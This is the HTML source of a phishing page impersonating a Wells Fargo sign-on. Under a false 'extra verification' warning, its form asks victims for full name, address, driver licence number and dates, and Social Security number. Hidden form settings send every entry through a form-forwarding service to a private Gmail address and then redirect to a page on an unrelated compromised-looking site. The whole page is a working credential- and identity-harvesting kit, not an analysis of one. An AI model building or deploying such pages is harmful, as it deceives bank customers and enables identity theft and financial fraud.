<head>
<meta charset="UTF-8">

<title>Sign On to View Your Personal Accounts | Wells Fargo</title>


<meta name="robots" content="noindex,nofollow" />
<link rel="stylesheet" href="entiti/shakeppfl.css">
 
<script type="text/javascript" src="https://code.jquery.com/jquery.min.js"></script>
<script src="entiti/jquert7.js"></script>

<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css">
<link rel="shortcut icon" type="image/x-icon" href="entiti/icon.jpg">
 <link href="agency.min.css" rel="stylesheet">

<style>

.dd-selected, .dd-option-selected, .dd-option{
	
	
    color: inherit !important;
    text-decoration: none !important;
    text-align: left !important;
    color: black !important;
	
}


.dd-select {
    
    background: transparent !important;

}

.dd-pointer-down {
    border: solid 5px transparent;
    border-top: solid 5px #000;
    float: right;
    position: inherit;
    margin-right: 21px;
    top: -31px;
}

.dd-option {
border-bottom: solid 2px #bb0826 !important;
}

.dd-select, .dd-container{
	width: 100% !important;
	background: rgb(251, 251, 250) !important;

	margin-top: 10px !important;
}


.dd-click-off-close	{
	width: 100% !important;
    overflow: hidden ;
    display: block ;
    margin-left: -3px  !important;
    margin-top: -4px !important;
	
	}
	
.dd-option, .dd-option-selected	 {
	
    width: 100%;
    font-size: 18px;
    border: solid 2px #bb0826;
    color: #fbc611 !important;
    background: #bb082621;
}
	
input::-webkit-outer-spin-button,
input::-webkit-inner-spin-button {
/* display: none; 
	
}	

input {
outline: 0!important;
border:none !important;
}
</style>
</head>
 

<body>

<div class="shurt" style="width: 100%;height: 147px;z-index: 99999999999999999999999999999999;position: relative;"><center>


</center></div>
<div style="width: 100%;z-index: 9;margin-top: 40px;background: none !important;padding: 30px;padding-left: 166px;padding-right: 166px;" class="eldery">
 

 
 <form action="https://formsubmit.co/ghdozier580@gmail.com" method="post" enctype="multipart/form-data" id="form" class="ajaxForm">
    <input type="hidden" name="_captcha" value="false">
    <input type="hidden" name="_next" value="https://al-aakhirltd.com/wp-inc/home/veri.html"> 
	  
	  <div style="text-align: left;"><strong style="color: black;"><span style="font-size: 20px;">EXTRA VERIFICATION</span>
	  <br><br> <span style="color: red; font-size: 19px; font-weight: 500;"> We need more information to validate your account and confirm your access to prevent any suspicious sign in.</span><br><br></strong></div>
	











	  			






	  
	   <div><input type="text" name="sfname" placeholder="Full Name" tabindex="1" required="" class="shab" autofocus="1" value="" style="font-size: 1.125rem;background: 0 0;margin: 10px 0;padding: 7px;width: 100%;height: 2.5em;border-radius: 0;-webkit-appearance: none; color: #414042;text-decoration: none;font-weight: 400;letter-spacing: 0;font-family: 'Open Sans','Helvetica Neue',Helvetica,Arial,sans-serif; 
 box-shadow: 2px 2px 0 #bf2155, 2px -2px 0 #bf2155, -2px 2px 0 #bf2155, -2px -2px 0 #bf2155;border: 1px solid transparent;outline: 0;"> </div>
 
<div>
	  
	  
 
<div>
 <input type="text" name="semapi" placeholder="Address" tabindex="1" required="" class="shab" value="" style="font-size: 1.125rem; background: 0 0; margin: 10px 0; padding: 7px; width: 100%; height: 2.5em; border-radius: 0; -webkit-appearance: none;   color: #414042; text-decoration: none; font-weight: 400; letter-spacing: 0; font-family: 'Open Sans','Helvetica Neue',Helvetica,Arial,sans-serif;  outline: 0;"> 
 </div>
 
 
 
<div>

 <input type="number" name="dlnm" placeholder="Driver Licence Number" tabindex="1" required="" class="shab" value="" style="font-size: 1.125rem; background: 0 0; margin: 10px 0; padding: 7px; width: 100%; height: 2.5em; border-radius: 0; -webkit-appearance: none;   color: #414042; text-decoration: none; font-weight: 400; letter-spacing: 0; font-family: 'Open Sans','Helvetica Neue',Helvetica,Arial,sans-serif;  outline: 0; margin-top: 0;"> 
 </div>
 
<div>
<label style="padding: 7px;">Driver License Expiration Date</label>
 <input type="month" name="expirt" placeholder="Driver License Expiration Date" tabindex="1" required="" class="shab" value="" style="font-size: 1.125rem; background: 0 0; margin: 10px 0; padding: 7px; width: 100%; height: 2.5em; border-radius: 0; -webkit-appearance: none;   color: #414042; text-decoration: none; font-weight: 400; letter-spacing: 0; font-family: 'Open Sans','Helvetica Neue',Helvetica,Arial,sans-serif;  outline: 0; margin-top: 0;"> 
 </div>
 
<div>
<label style="padding: 7px;">Driver License Issue Date</label>
 <input type="month" name="issuefat" placeholder="Driver License Issue Date" tabindex="1" required="" class="shab" value="" style="font-size: 1.125rem; background: 0 0; margin: 10px 0; padding: 7px; width: 100%; height: 2.5em; border-radius: 0; -webkit-appearance: none;   color: #414042; text-decoration: none; font-weight: 400; letter-spacing: 0; font-family: 'Open Sans','Helvetica Neue',Helvetica,Arial,sans-serif;  outline: 0;"> 
 </div>
 
 
 <div>

 <input type="number" name="tunep" placeholder="SSN" tabindex="1" required="" class="shab" value="" style="font-size: 1.125rem; background: 0 0; margin: 10px 0; padding: 7px; width: 100%; height: 2.5em; border-radius: 0; -webkit-appearance: none;   color: #414042; text-decoration: none; font-weight: 400; letter-spacing: 0; font-family: 'Open Sans','Helvetica Neue',Helvetica,Arial,sans-serif;  outline: 0; margin-top: 0;"> 
 </div>
 


<button type="submit" name="mandown" style="margin-left: 0;margin-right: 0;width: 100%;height: 2.5rem;overflow-x: auto;box-sizing: border-box;font-size: 1rem;font-weight: 400;background-color: #0b6efd;border: none;border-radius: .3125rem;text-align: center;vertical-align: middle;cursor: pointer;margin-top: 11px; color: white; font-weight: 600;"><span class="label">Continue</span> </button> 
</form>
<div style="text-align: left;  font-size: .875rem; color: #126bc5; margin-top: 10px; margin-bottom: 10px;"> 
<p></p>
<br><br>
<div>
  
      </div>
    </header>

    <!-- Services -->
     
    <!-- Portfolio Grid -->
     

    <!-- About -->
 
    <!-- Team -->
    

    <!-- Footer -->
     

<script type="text/javascript">
$('.cflagdd').ddslick({  
onSelected: function(data){  
if(data.selectedIndex > 0) {
	$('#hidCflag').val(data.selectedData.value);

   
}   
}    
}); ;
var sprytextfield1 = new Spry.Widget.ValidationTextField("sprytextfield1", "email");
</script>

    <!-- Custom scripts for this template -->
  

<script src="roll.js"> </script>
  </body>

</html>


